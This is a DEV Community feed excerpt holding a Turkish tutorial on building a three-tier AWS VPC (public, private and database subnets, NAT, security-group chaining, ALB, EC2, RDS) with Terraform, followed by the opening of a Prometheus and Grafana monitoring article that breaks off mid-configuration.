DEV Community: Taha Yağız Güler The latest articles on DEV Community by Taha Yağız Güler (@tahayagizguler). https://dev.to/tahayagizguler https://media2.dev.to/dynamic/image/width=90,height=90,fit=cover,gravity=auto,format=auto/https:%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Fuser%2Fprofile_image%2F952125%2Ffaa47bfc-be25-4e2b-abe3-737a4fc38024.jpeg DEV Community: Taha Yağız Güler https://dev.to/tahayagizguler en AWS VPC Networking — Public Subnet, Private Subnet ve 3-Tier Mimari Taha Yağız Güler Sat, 30 May 2026 14:17:51 +0000 https://dev.to/tahayagizguler/aws-vpc-networking-public-subnet-private-subnet-ve-3-tier-mimari-1p7g https://dev.to/tahayagizguler/aws-vpc-networking-public-subnet-private-subnet-ve-3-tier-mimari-1p7g <h2> Temel Kavramlar </h2> <h3> CIDR — IP Adresi Aralığı </h3> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>10.0.0.0/16 → 65,536 IP adresi (VPC için) 10.0.1.0/24 → 256 IP adresi (subnet için) </code></pre> </div> <p>VPC CIDR'ı subnet'leri kapsamalı — <code>10.0.0.0/16</code> VPC'nin içinde <code>10.0.1.0/24</code> subnet açılabilir.</p> <h3> Route Table — Trafik Yönlendirme </h3> <p>Subnet'e gelen trafiğin nereye gideceğini söyler. <strong>Public ve private subnet'in tek teknik farkı burada:</strong><br> </p> <div class="highlight js-code-highlight"> <pre class="highlight conf"><code><span class="n">Public</span> <span class="n">subnet</span> <span class="n">route</span> <span class="n">table</span>: <span class="m">10</span>.<span class="m">0</span>.<span class="m">0</span>.<span class="m">0</span>/<span class="m">16</span> → <span class="n">local</span> (<span class="n">VPC</span> <span class="n">i</span>ç<span class="n">i</span>) <span class="m">0</span>.<span class="m">0</span>.<span class="m">0</span>.<span class="m">0</span>/<span class="m">0</span> → <span class="n">IGW</span> (<span class="n">internete</span> çı<span class="n">k</span>) <span class="n">Private</span> <span class="n">subnet</span> <span class="n">route</span> <span class="n">table</span>: <span class="m">10</span>.<span class="m">0</span>.<span class="m">0</span>.<span class="m">0</span>/<span class="m">16</span> → <span class="n">local</span> (<span class="n">VPC</span> <span class="n">i</span>ç<span class="n">i</span>) <span class="m">0</span>.<span class="m">0</span>.<span class="m">0</span>.<span class="m">0</span>/<span class="m">0</span> → <span class="n">NAT</span> (<span class="n">NAT</span> ü<span class="n">zerinden</span> <span class="n">d</span>ış<span class="n">a</span> çı<span class="n">k</span>) <span class="n">DB</span> <span class="n">subnet</span> <span class="n">route</span> <span class="n">table</span>: <span class="m">10</span>.<span class="m">0</span>.<span class="m">0</span>.<span class="m">0</span>/<span class="m">16</span> → <span class="n">local</span> (<span class="n">sadece</span> <span class="n">VPC</span> <span class="n">i</span>ç<span class="n">i</span> — <span class="n">internet</span> <span class="n">yok</span>) </code></pre> </div> <h3> IGW vs NAT Gateway </h3> <p><strong>Internet Gateway:</strong> İki yönlü kapı. Dışarıdan içeri, içeriden dışarı trafik geçer. Public subnet'teki kaynaklar public IP alır, doğrudan internete açılır.</p> <p><strong>NAT Gateway:</strong> Tek yönlü kapı. Sadece içeriden dışarıya. Private subnet'teki EC2 <code>dnf update</code> yapmak için NAT üzerinden çıkar ama dışarıdan bu EC2'ya doğrudan erişilemez.</p> <h2> Kurduğumuz Mimari </h2> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>İnternet ↓ Internet Gateway ↓ ┌─────────────────────────────────────┐ │ Public Subnet (AZ-a + AZ-b) │ │ ALB + NAT Gateway │ │ Route: 0.0.0.0/0 → IGW │ └─────────────────────────────────────┘ ↓ ┌─────────────────────────────────────┐ │ Private Subnet (AZ-a + AZ-b) │ │ EC2 — Uygulama Sunucusu │ │ Route: 0.0.0.0/0 → NAT │ └─────────────────────────────────────┘ ↓ ┌─────────────────────────────────────┐ │ DB Subnet (AZ-a + AZ-b) │ │ RDS — PostgreSQL │ │ Route: sadece local (internet yok) │ └─────────────────────────────────────┘ </code></pre> </div> <p>Her katmanda 2 AZ — biri düşerse diğeri devam eder.</p> <h2> Terraform ile VPC Kurulumu </h2> <h3> VPC ve Subnet'ler </h3> <div class="highlight js-code-highlight"> <pre class="highlight hcl"><code><span class="nx">resource</span> <span class="s2">"aws_vpc"</span> <span class="s2">"main"</span> <span class="p">{</span> <span class="nx">cidr_block</span> <span class="p">=</span> <span class="s2">"10.0.0.0/16"</span> <span class="nx">enable_dns_hostnames</span> <span class="p">=</span> <span class="kc">true</span> <span class="nx">enable_dns_support</span> <span class="p">=</span> <span class="kc">true</span> <span class="nx">tags</span> <span class="p">=</span> <span class="p">{</span> <span class="nx">Name</span> <span class="p">=</span> <span class="s2">"${var.environment}-vpc"</span> <span class="p">}</span> <span class="p">}</span> <span class="c1"># Public Subnet — 2 AZ</span> <span class="nx">resource</span> <span class="s2">"aws_subnet"</span> <span class="s2">"public"</span> <span class="p">{</span> <span class="nx">count</span> <span class="p">=</span> <span class="nx">length</span><span class="p">(</span><span class="nx">var</span><span class="p">.</span><span class="nx">azs</span><span class="p">)</span> <span class="nx">vpc_id</span> <span class="p">=</span> <span class="nx">aws_vpc</span><span class="p">.</span><span class="nx">main</span><span class="p">.</span><span class="nx">id</span> <span class="nx">cidr_block</span> <span class="p">=</span> <span class="nx">cidrsubnet</span><span class="p">(</span><span class="nx">var</span><span class="p">.</span><span class="nx">vpc_cidr</span><span class="p">,</span> <span class="mi">8</span><span class="p">,</span> <span class="nx">count</span><span class="p">.</span><span class="nx">index</span> <span class="err">+</span> <span class="mi">1</span><span class="p">)</span> <span class="nx">availability_zone</span> <span class="p">=</span> <span class="nx">var</span><span class="p">.</span><span class="nx">azs</span><span class="p">[</span><span class="nx">count</span><span class="p">.</span><span class="nx">index</span><span class="p">]</span> <span class="nx">map_public_ip_on_launch</span> <span class="p">=</span> <span class="kc">true</span> <span class="nx">tags</span> <span class="p">=</span> <span class="p">{</span> <span class="nx">Name</span> <span class="p">=</span> <span class="s2">"${var.environment}-public-${var.azs[count.index]}"</span> <span class="nx">Tier</span> <span class="p">=</span> <span class="s2">"public"</span> <span class="p">}</span> <span class="p">}</span> <span class="c1"># Private Subnet — 2 AZ</span> <span class="nx">resource</span> <span class="s2">"aws_subnet"</span> <span class="s2">"private"</span> <span class="p">{</span> <span class="nx">count</span> <span class="p">=</span> <span class="nx">length</span><span class="p">(</span><span class="nx">var</span><span class="p">.</span><span class="nx">azs</span><span class="p">)</span> <span class="nx">vpc_id</span> <span class="p">=</span> <span class="nx">aws_vpc</span><span class="p">.</span><span class="nx">main</span><span class="p">.</span><span class="nx">id</span> <span class="nx">cidr_block</span> <span class="p">=</span> <span class="nx">cidrsubnet</span><span class="p">(</span><span class="nx">var</span><span class="p">.</span><span class="nx">vpc_cidr</span><span class="p">,</span> <span class="mi">8</span><span class="p">,</span> <span class="nx">count</span><span class="p">.</span><span class="nx">index</span> <span class="err">+</span> <span class="mi">3</span><span class="p">)</span> <span class="nx">availability_zone</span> <span class="p">=</span> <span class="nx">var</span><span class="p">.</span><span class="nx">azs</span><span class="p">[</span><span class="nx">count</span><span class="p">.</span><span class="nx">index</span><span class="p">]</span> <span class="nx">tags</span> <span class="p">=</span> <span class="p">{</span> <span class="nx">Name</span> <span class="p">=</span> <span class="s2">"${var.environment}-private-${var.azs[count.index]}"</span> <span class="nx">Tier</span> <span class="p">=</span> <span class="s2">"private"</span> <span class="p">}</span> <span class="p">}</span> <span class="c1"># DB Subnet — 2 AZ</span> <span class="nx">resource</span> <span class="s2">"aws_subnet"</span> <span class="s2">"db"</span> <span class="p">{</span> <span class="nx">count</span> <span class="p">=</span> <span class="nx">length</span><span class="p">(</span><span class="nx">var</span><span class="p">.</span><span class="nx">azs</span><span class="p">)</span> <span class="nx">vpc_id</span> <span class="p">=</span> <span class="nx">aws_vpc</span><span class="p">.</span><span class="nx">main</span><span class="p">.</span><span class="nx">id</span> <span class="nx">cidr_block</span> <span class="p">=</span> <span class="nx">cidrsubnet</span><span class="p">(</span><span class="nx">var</span><span class="p">.</span><span class="nx">vpc_cidr</span><span class="p">,</span> <span class="mi">8</span><span class="p">,</span> <span class="nx">count</span><span class="p">.</span><span class="nx">index</span> <span class="err">+</span> <span class="mi">5</span><span class="p">)</span> <span class="nx">availability_zone</span> <span class="p">=</span> <span class="nx">var</span><span class="p">.</span><span class="nx">azs</span><span class="p">[</span><span class="nx">count</span><span class="p">.</span><span class="nx">index</span><span class="p">]</span> <span class="nx">tags</span> <span class="p">=</span> <span class="p">{</span> <span class="nx">Name</span> <span class="p">=</span> <span class="s2">"${var.environment}-db-${var.azs[count.index]}"</span> <span class="nx">Tier</span> <span class="p">=</span> <span class="s2">"db"</span> <span class="p">}</span> <span class="p">}</span> </code></pre> </div> <p><code>cidrsubnet(var.vpc_cidr, 8, count.index + 1)</code> otomatik CIDR hesaplıyor:</p> <ul> <li>public: <code>10.0.1.0/24</code>, <code>10.0.2.0/24</code> </li> <li>private: <code>10.0.3.0/24</code>, <code>10.0.4.0/24</code> </li> <li>db: <code>10.0.5.0/24</code>, <code>10.0.6.0/24</code> </li> </ul> <h3> IGW, NAT ve Route Table'lar </h3> <div class="highlight js-code-highlight"> <pre class="highlight hcl"><code><span class="nx">resource</span> <span class="s2">"aws_internet_gateway"</span> <span class="s2">"main"</span> <span class="p">{</span> <span class="nx">vpc_id</span> <span class="p">=</span> <span class="nx">aws_vpc</span><span class="p">.</span><span class="nx">main</span><span class="p">.</span><span class="nx">id</span> <span class="p">}</span> <span class="nx">resource</span> <span class="s2">"aws_eip"</span> <span class="s2">"nat"</span> <span class="p">{</span> <span class="nx">domain</span> <span class="p">=</span> <span class="s2">"vpc"</span> <span class="p">}</span> <span class="nx">resource</span> <span class="s2">"aws_nat_gateway"</span> <span class="s2">"main"</span> <span class="p">{</span> <span class="nx">allocation_id</span> <span class="p">=</span> <span class="nx">aws_eip</span><span class="p">.</span><span class="nx">nat</span><span class="p">.</span><span class="nx">id</span> <span class="nx">subnet_id</span> <span class="p">=</span> <span class="nx">aws_subnet</span><span class="p">.</span><span class="nx">public</span><span class="p">[</span><span class="mi">0</span><span class="p">].</span><span class="nx">id</span> <span class="c1"># NAT public subnet'te olmalı</span> <span class="nx">depends_on</span> <span class="p">=</span> <span class="p">[</span><span class="nx">aws_internet_gateway</span><span class="p">.</span><span class="nx">main</span><span class="p">]</span> <span class="p">}</span> <span class="c1"># Public route table — IGW üzerinden internete</span> <span class="nx">resource</span> <span class="s2">"aws_route_table"</span> <span class="s2">"public"</span> <span class="p">{</span> <span class="nx">vpc_id</span> <span class="p">=</span> <span class="nx">aws_vpc</span><span class="p">.</span><span class="nx">main</span><span class="p">.</span><span class="nx">id</span> <span class="nx">route</span> <span class="p">{</span> <span class="nx">cidr_block</span> <span class="p">=</span> <span class="s2">"0.0.0.0/0"</span> <span class="nx">gateway_id</span> <span class="p">=</span> <span class="nx">aws_internet_gateway</span><span class="p">.</span><span class="nx">main</span><span class="p">.</span><span class="nx">id</span> <span class="p">}</span> <span class="p">}</span> <span class="c1"># Private route table — NAT üzerinden dışa</span> <span class="nx">resource</span> <span class="s2">"aws_route_table"</span> <span class="s2">"private"</span> <span class="p">{</span> <span class="nx">vpc_id</span> <span class="p">=</span> <span class="nx">aws_vpc</span><span class="p">.</span><span class="nx">main</span><span class="p">.</span><span class="nx">id</span> <span class="nx">route</span> <span class="p">{</span> <span class="nx">cidr_block</span> <span class="p">=</span> <span class="s2">"0.0.0.0/0"</span> <span class="nx">nat_gateway_id</span> <span class="p">=</span> <span class="nx">aws_nat_gateway</span><span class="p">.</span><span class="nx">main</span><span class="p">.</span><span class="nx">id</span> <span class="p">}</span> <span class="p">}</span> <span class="c1"># DB route table — internet yok</span> <span class="nx">resource</span> <span class="s2">"aws_route_table"</span> <span class="s2">"db"</span> <span class="p">{</span> <span class="nx">vpc_id</span> <span class="p">=</span> <span class="nx">aws_vpc</span><span class="p">.</span><span class="nx">main</span><span class="p">.</span><span class="nx">id</span> <span class="c1"># 0.0.0.0/0 route yok</span> <span class="p">}</span> </code></pre> </div> <h2> Security Group Tasarımı </h2> <p>En kritik nokta: IP aralığı değil, SG referansı kullan.<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight hcl"><code><span class="c1"># ALB SG — internetten 80/443</span> <span class="nx">resource</span> <span class="s2">"aws_security_group"</span> <span class="s2">"alb"</span> <span class="p">{</span> <span class="nx">ingress</span> <span class="p">{</span> <span class="nx">from_port</span> <span class="p">=</span> <span class="mi">80</span> <span class="nx">to_port</span> <span class="p">=</span> <span class="mi">80</span> <span class="nx">protocol</span> <span class="p">=</span> <span class="s2">"tcp"</span> <span class="nx">cidr_blocks</span> <span class="p">=</span> <span class="p">[</span><span class="s2">"0.0.0.0/0"</span><span class="p">]</span> <span class="p">}</span> <span class="p">}</span> <span class="c1"># App SG — sadece ALB SG'den trafik alır</span> <span class="nx">resource</span> <span class="s2">"aws_security_group"</span> <span class="s2">"app"</span> <span class="p">{</span> <span class="nx">ingress</span> <span class="p">{</span> <span class="nx">from_port</span> <span class="p">=</span> <span class="mi">8080</span> <span class="nx">to_port</span> <span class="p">=</span> <span class="mi">8080</span> <span class="nx">protocol</span> <span class="p">=</span> <span class="s2">"tcp"</span> <span class="nx">security_groups</span> <span class="p">=</span> <span class="p">[</span><span class="nx">aws_security_group</span><span class="p">.</span><span class="nx">alb</span><span class="p">.</span><span class="nx">id</span><span class="p">]</span> <span class="c1"># IP değil SG referansı — ALB IP'si değişse bile kural geçerli</span> <span class="p">}</span> <span class="p">}</span> <span class="c1"># RDS SG — sadece App SG'den trafik alır</span> <span class="nx">resource</span> <span class="s2">"aws_security_group"</span> <span class="s2">"rds"</span> <span class="p">{</span> <span class="nx">ingress</span> <span class="p">{</span> <span class="nx">from_port</span> <span class="p">=</span> <span class="mi">5432</span> <span class="nx">to_port</span> <span class="p">=</span> <span class="mi">5432</span> <span class="nx">protocol</span> <span class="p">=</span> <span class="s2">"tcp"</span> <span class="nx">security_groups</span> <span class="p">=</span> <span class="p">[</span><span class="nx">aws_security_group</span><span class="p">.</span><span class="nx">app</span><span class="p">.</span><span class="nx">id</span><span class="p">]</span> <span class="p">}</span> <span class="p">}</span> </code></pre> </div> <p>Bu zincir şunu sağlıyor:</p> <ul> <li>İnternet → ALB (port 80)</li> <li>ALB → EC2 (port 8080)</li> <li>EC2 → RDS (port 5432)</li> <li>İnternet → EC2 ❌</li> <li>İnternet → RDS ❌</li> <li>EC2 → RDS doğrudan ❌ (sadece app-sg üzerinden)</li> </ul> <h2> ALB — Public Subnet </h2> <div class="highlight js-code-highlight"> <pre class="highlight hcl"><code><span class="nx">resource</span> <span class="s2">"aws_lb"</span> <span class="s2">"main"</span> <span class="p">{</span> <span class="nx">name</span> <span class="p">=</span> <span class="s2">"${var.environment}-alb"</span> <span class="nx">internal</span> <span class="p">=</span> <span class="kc">false</span> <span class="nx">load_balancer_type</span> <span class="p">=</span> <span class="s2">"application"</span> <span class="nx">security_groups</span> <span class="p">=</span> <span class="p">[</span><span class="nx">var</span><span class="p">.</span><span class="nx">alb_sg_id</span><span class="p">]</span> <span class="nx">subnets</span> <span class="p">=</span> <span class="nx">var</span><span class="p">.</span><span class="nx">public_subnet_ids</span> <span class="c1"># 2 AZ</span> <span class="p">}</span> <span class="nx">resource</span> <span class="s2">"aws_lb_target_group"</span> <span class="s2">"app"</span> <span class="p">{</span> <span class="nx">port</span> <span class="p">=</span> <span class="mi">8080</span> <span class="nx">protocol</span> <span class="p">=</span> <span class="s2">"HTTP"</span> <span class="nx">vpc_id</span> <span class="p">=</span> <span class="nx">var</span><span class="p">.</span><span class="nx">vpc_id</span> <span class="nx">health_check</span> <span class="p">{</span> <span class="nx">path</span> <span class="p">=</span> <span class="s2">"/health"</span> <span class="nx">healthy_threshold</span> <span class="p">=</span> <span class="mi">2</span> <span class="nx">unhealthy_threshold</span> <span class="p">=</span> <span class="mi">3</span> <span class="p">}</span> <span class="p">}</span> <span class="nx">resource</span> <span class="s2">"aws_lb_listener"</span> <span class="s2">"http"</span> <span class="p">{</span> <span class="nx">load_balancer_arn</span> <span class="p">=</span> <span class="nx">aws_lb</span><span class="p">.</span><span class="nx">main</span><span class="p">.</span><span class="nx">arn</span> <span class="nx">port</span> <span class="p">=</span> <span class="mi">80</span> <span class="nx">protocol</span> <span class="p">=</span> <span class="s2">"HTTP"</span> <span class="nx">default_action</span> <span class="p">{</span> <span class="nx">type</span> <span class="p">=</span> <span class="s2">"forward"</span> <span class="nx">target_group_arn</span> <span class="p">=</span> <span class="nx">aws_lb_target_group</span><span class="p">.</span><span class="nx">app</span><span class="p">.</span><span class="nx">arn</span> <span class="p">}</span> <span class="p">}</span> </code></pre> </div> <h2> EC2 — Private Subnet </h2> <div class="highlight js-code-highlight"> <pre class="highlight hcl"><code><span class="nx">resource</span> <span class="s2">"aws_instance"</span> <span class="s2">"app"</span> <span class="p">{</span> <span class="nx">instance_type</span> <span class="p">=</span> <span class="s2">"t3.micro"</span> <span class="nx">subnet_id</span> <span class="p">=</span> <span class="nx">var</span><span class="p">.</span><span class="nx">private_subnet_ids</span><span class="p">[</span><span class="mi">0</span><span class="p">]</span> <span class="nx">vpc_security_group_ids</span> <span class="p">=</span> <span class="p">[</span><span class="nx">var</span><span class="p">.</span><span class="nx">app_sg_id</span><span class="p">]</span> <span class="c1"># Public IP yok — private subnet'te</span> <span class="nx">user_data</span> <span class="p">=</span> <span class="o">&lt;&lt;-</span><span class="no">USERDATA</span><span class="sh"> #!/bin/bash dnf install -y nginx cat &gt; /etc/nginx/conf.d/app.conf &lt;&lt; 'NGINX' server { listen 8080; location / { return 200 'Hello from private subnet!\n'; } location /health { return 200 '{"status":"ok"}'; } } NGINX systemctl restart nginx </span><span class="no"> USERDATA </span><span class="p">}</span> <span class="c1"># EC2'yu ALB target group'a bağla</span> <span class="nx">resource</span> <span class="s2">"aws_lb_target_group_attachment"</span> <span class="s2">"app"</span> <span class="p">{</span> <span class="nx">target_group_arn</span> <span class="p">=</span> <span class="nx">var</span><span class="p">.</span><span class="nx">target_group_arn</span> <span class="nx">target_id</span> <span class="p">=</span> <span class="nx">aws_instance</span><span class="p">.</span><span class="nx">app</span><span class="p">.</span><span class="nx">id</span> <span class="nx">port</span> <span class="p">=</span> <span class="mi">8080</span> <span class="p">}</span> </code></pre> </div> <h2> RDS — DB Subnet </h2> <div class="highlight js-code-highlight"> <pre class="highlight hcl"><code><span class="nx">resource</span> <span class="s2">"aws_db_subnet_group"</span> <span class="s2">"main"</span> <span class="p">{</span> <span class="nx">subnet_ids</span> <span class="p">=</span> <span class="nx">var</span><span class="p">.</span><span class="nx">db_subnet_ids</span> <span class="c1"># DB subnet'ler</span> <span class="p">}</span> <span class="nx">resource</span> <span class="s2">"aws_db_instance"</span> <span class="s2">"main"</span> <span class="p">{</span> <span class="nx">engine</span> <span class="p">=</span> <span class="s2">"postgres"</span> <span class="nx">engine_version</span> <span class="p">=</span> <span class="s2">"15"</span> <span class="nx">instance_class</span> <span class="p">=</span> <span class="s2">"db.t3.micro"</span> <span class="nx">db_subnet_group_name</span> <span class="p">=</span> <span class="nx">aws_db_subnet_group</span><span class="p">.</span><span class="nx">main</span><span class="p">.</span><span class="nx">name</span> <span class="nx">vpc_security_group_ids</span> <span class="p">=</span> <span class="p">[</span><span class="nx">var</span><span class="p">.</span><span class="nx">rds_sg_id</span><span class="p">]</span> <span class="nx">publicly_accessible</span> <span class="p">=</span> <span class="kc">false</span> <span class="c1"># internet'ten erişilemez</span> <span class="nx">skip_final_snapshot</span> <span class="p">=</span> <span class="kc">true</span> <span class="p">}</span> </code></pre> </div> <h2> Doğrulama Testleri </h2> <p><strong>Test 1 — ALB üzerinden erişim:</strong><br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code>curl http://&lt;alb-dns-name&gt; <span class="c"># Hello from private subnet!</span> </code></pre> </div> <p><strong>Test 2 — EC2 private IP, public IP yok:</strong><br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code>terraform output app_private_ip <span class="c"># 10.0.3.111 — public IP yok</span> </code></pre> </div> <p><strong>Test 3 — RDS dışarıdan erişilemiyor:</strong><br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code>nc <span class="nt">-zv</span> &lt;rds-address&gt; 5432 <span class="nt">-w</span> 5 <span class="c"># Connection timed out</span> </code></pre> </div> <p><strong>Test 4 — Private EC2 NAT üzerinden dışa çıkabiliyor:</strong></p> <p>SSM Session Manager ile EC2'ya bağlanıp <code>curl ifconfig.me</code> yaptığında NAT Gateway'in Elastic IP'sini görüyorsun — EC2'nun kendi IP'si değil.</p> <h2> Production Best Practices </h2> <p><strong>Her AZ'de ayrı NAT Gateway:</strong><br> </p> <div class="highlight js-code-highlight"> <pre class="highlight hcl"><code><span class="c1"># Lab'da tek NAT — production'da her AZ için</span> <span class="nx">resource</span> <span class="s2">"aws_nat_gateway"</span> <span class="s2">"main"</span> <span class="p">{</span> <span class="nx">count</span> <span class="p">=</span> <span class="nx">length</span><span class="p">(</span><span class="nx">var</span><span class="p">.</span><span class="nx">azs</span><span class="p">)</span> <span class="nx">subnet_id</span> <span class="p">=</span> <span class="nx">aws_subnet</span><span class="p">.</span><span class="nx">public</span><span class="p">[</span><span class="nx">count</span><span class="p">.</span><span class="nx">index</span><span class="p">].</span><span class="nx">id</span> <span class="nx">allocation_id</span> <span class="p">=</span> <span class="nx">aws_eip</span><span class="p">.</span><span class="nx">nat</span><span class="p">[</span><span class="nx">count</span><span class="p">.</span><span class="nx">index</span><span class="p">].</span><span class="nx">id</span> <span class="p">}</span> </code></pre> </div> <p>Tek NAT Gateway varken o AZ düşerse tüm private subnet'lerin internet erişimi kesilir.</p> <p><strong>Bastion host yerine SSM:</strong><br> </p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>Eski: Bastion host (public) → SSH → private EC2 Yeni: SSM Session Manager → private EC2 </code></pre> </div> <p>SSM ile SSH portu kapalı, bastion host maliyeti yok, key yönetimi yok. IAM policy ile kimin hangi instance'a bağlanabileceği kontrol ediliyor.</p> <p><strong>VPC Flow Logs:</strong><br> </p> <div class="highlight js-code-highlight"> <pre class="highlight hcl"><code><span class="nx">resource</span> <span class="s2">"aws_flow_log"</span> <span class="s2">"main"</span> <span class="p">{</span> <span class="nx">vpc_id</span> <span class="p">=</span> <span class="nx">aws_vpc</span><span class="p">.</span><span class="nx">main</span><span class="p">.</span><span class="nx">id</span> <span class="nx">traffic_type</span> <span class="p">=</span> <span class="s2">"ALL"</span> <span class="p">}</span> </code></pre> </div> <p>Güvenlik olaylarında "kim nereye bağlandı" sorusunun cevabı burada.</p> <p><strong>RDS multi-AZ:</strong><br> </p> <div class="highlight js-code-highlight"> <pre class="highlight hcl"><code><span class="nx">resource</span> <span class="s2">"aws_db_instance"</span> <span class="s2">"main"</span> <span class="p">{</span> <span class="nx">multi_az</span> <span class="p">=</span> <span class="kc">true</span> <span class="c1"># otomatik failover</span> <span class="p">}</span> </code></pre> </div> <h2> Öğrendiklerim </h2> <p>Bu lab'dan önce "public subnet internete açık, private subnet kapalı" diyordum. Şimdi şunu söyleyebiliyorum:</p> <p>Public ve private subnet'in tek teknik farkı route table'da — public'te <code>0.0.0.0/0 → IGW</code> var, private'te <code>0.0.0.0/0 → NAT</code> var, DB subnet'te hiç internet route'u yok.</p> <p>IGW iki yönlü, NAT tek yönlü. Private EC2 güncelleme yapmak için NAT kullanır ama dışarıdan ona ulaşılamaz. RDS DB subnet'te çünkü oradan internet rotası yok — en kritik veri en izole katmanda.</p> <p>Security group'larda IP aralığı değil SG referansı kullanmak önemli — ALB IP'si değişse bile app-sg kuralı bozulmaz.</p> <p><em>Bu yazı, bir mülakattan aldığım geri bildirimi uygulamalı olarak çalışma serim.</em><br> <em>Serinin diğer yazıları:</em></p> <ul> <li><em><a href="https://dev.to/tahayagizguler/terraform-terragrunt-ansible-a-hands-on-learning-journey-jed">Terraform + Terragrunt + Ansible: A Hands-On Learning Journey</a></em></li> <li><em><a href="https://dev.to/tahayagizguler/kubernetes-probelarini-bozarak-ogrenmek-liveness-readiness-ve-startup-3meh">Kubernetes Probe'larını Kasıtlı Bozarak Öğrendim</a></em></li> <li><em><a href="https://dev.to/tahayagizguler/container-icine-giremiyorum-ve-bu-iyi-bir-sey-distroless-imagelar-hik">Container İçine Giremiyorum — Ve Bu İyi Bir Şey: Distroless Image'lar</a></em></li> <li><em><a href="https://dev.to/tahayagizguler/prometheus-ve-grafanayi-derinlemesine-anlamak-tsdb-promql-ve-custom-exporter-1enp">Prometheus ve Grafana'yı Derinlemesine Anlamak</a></em></li> </ul> <h2> <em>All code from this lab is available on <a href="https://Github.com/tahayagizguler/aws-vpc-lab" rel="noopener noreferrer">GitHub</a>. If you spot something that could be done better, I'd genuinely love to hear it in the comments.</em> </h2> aws terraform devops networking Prometheus ve Grafana'yı Derinlemesine Anlamak — TSDB, PromQL ve Custom Exporter Taha Yağız Güler Wed, 27 May 2026 16:02:57 +0000 https://dev.to/tahayagizguler/prometheus-ve-grafanayi-derinlemesine-anlamak-tsdb-promql-ve-custom-exporter-1enp https://dev.to/tahayagizguler/prometheus-ve-grafanayi-derinlemesine-anlamak-tsdb-promql-ve-custom-exporter-1enp <h2> Neden TSDB? </h2> <p>Normal bir veritabanında bir satır güncellenir — eski değer gider, yeni değer gelir. Monitoring'de bu işe yaramaz. "CPU şu an %45" bilgisi değil, "CPU son 1 saatte nasıl değişti" bilgisi lazım.</p> <p>TSDB — Time Series Database. Her ölçüm ayrı bir nokta olarak saklanır:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight prometheus"><code><span class="n">cpu_usage</span><span class="p">{</span><span class="na">instance</span><span class="o">=</span><span class="s2">"server-1"</span><span class="p">}</span> <span class="err">→</span> <span class="p">[(</span><span class="mi">10</span><span class="n">:00</span><span class="p">,</span> <span class="mi">45</span><span class="p">),</span> <span class="p">(</span><span class="mi">10</span><span class="n">:15</span><span class="p">,</span> <span class="mi">52</span><span class="p">),</span> <span class="p">(</span><span class="mi">10</span><span class="n">:30</span><span class="p">,</span> <span class="mi">61</span><span class="p">),</span> <span class="p">(</span><span class="mi">10</span><span class="n">:45</span><span class="p">,</span> <span class="mi">48</span><span class="p">)]</span> </code></pre> </div> <p>Normal veritabanında "son 1 saatteki tüm CPU değerlerini getir" sorgusu tüm tabloyu tarar. TSDB'de bu zaten veri modelinin kendisi — timestamp'e göre sıralı saklıyor, range query neredeyse anlık.</p> <p><strong>İki ek kazanım:</strong></p> <p><em>Sıkıştırma:</em> CPU değerleri birbirine yakın — 45, 47, 44, 46. TSDB delta encoding ile bu benzer değerleri çok verimli sıkıştırıyor. Prometheus ortalama sample başına sadece 1.3 byte kullanıyor.</p> <p><em>Retention yönetimi:</em> "Son 15 günü tut, eskisini sil" TSDB'de trivial — zaman bazlı block'lar halinde saklıyor, eski block'ları sil.</p> <h2> Pull-based Mimari </h2> <p>Prometheus hedeflerine giderek metric çekiyor — <code>/metrics</code> endpoint'ini ziyaret ediyor. Push-based sistemlerde uygulama metric'lerini merkezi yere göndermek zorunda.</p> <p>Neden pull daha iyi?</p> <p>Uygulama çöktüğünde push-based sistemde son başarılı push'u aldık mı, yoksa çökmeden önce mi gönderdi — belirsiz. Pull-based'de Prometheus scrape etmeye çalışır, başarısız olur — bu durumun kendisi bir sinyal, alert tetikler.</p> <h2> Lab Ortamı </h2> <p>Docker Compose ile Prometheus + Grafana + custom exporter stack'i:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>prometheus-lab/ ├── docker-compose.yml ├── prometheus/ │ ├── prometheus.yml │ └── rules.yml ├── grafana/ │ └── provisioning/ │ └── datasources/ │ └── prometheus.yml └── custom-exporter/ ├── exporter.py └── Dockerfile </code></pre> </div> <p><strong><code>prometheus/prometheus.yml</code></strong><br> </p> <div class="highlight js-code-highlight"> <pre class="highlight yaml"><code><span class="na">global</span><span class="pi">:</span> <span class="na">scrape_interval</span><span class="pi">:</span> <span class="s">15s</span> <span class="na">evaluation_interval</span><span class="pi">:</span> <span class="s">15s</span> <span class="na">rule_files</span><span class="pi">:</span> <span class="pi">-</span> <span class="s2">"</span><span class="s">rules.yml"</span> <span class="na">scrape_configs</span><span class="pi">:</span> <span class="pi">-</span> <span class="na">job_name</span><span class="pi">:</span> <span class="s1">'</span><span class="s">prometheus'</span> <span class="na">static_configs</span><span class="pi">:</span> <span class="pi">-</span> <span class="na">targets</span><span class="pi">:</span> <span class="pi">[</span><span class="s1">'</span><span class="s">localhost:9090'</span><span class="pi">]</span> <span class="pi">-</span> <span class="na">job_name</span><span class="pi">:</span> <span class="s1">'</span><span class="s">custom-exporter'</span> <span class="na">static_configs</span><span class="pi">:</span> <span class="pi">-</span> <span class="na">targets</span><span class="pi">:</span> <span class="pi">[</span><span class="s1">'</span><span class="s">custom-exporter:8000'</span><span class="pi">]</span> </code></pre> </div> <p><strong><code>docker-compose.yml</code></strong><br> </p> <div class="highlight js-code-highlight"> <pre class="highlight yaml"><code><span class="na">version</span><span class="pi">:</span> <span class="s1">'</span><span class="s">3.8'</span> <span class="na">services</span><span class="pi">:</span> <span class="na">prometheus</span><span class="pi">:</span> <span class="na">image</span><span class="pi">:</span> <span class="s">prom/prometheus:latest</span> <span class="na">ports</span><span class="pi">:</span> <span class="pi">-</span> <span class="s2">"</span><span class="s">9090:9090"</span> <span class="na">volumes</span><span class="pi">:</span> <span class="pi">-</span> <span class="s">./prometheus:/etc/prometheus</span> <span class="pi">-</span> <span class="s">prometheus_data:/prometheus</span> <span class="na">command</span><span class="pi">:</span> <span class="pi">-</span> <span class="s1">'</span><span 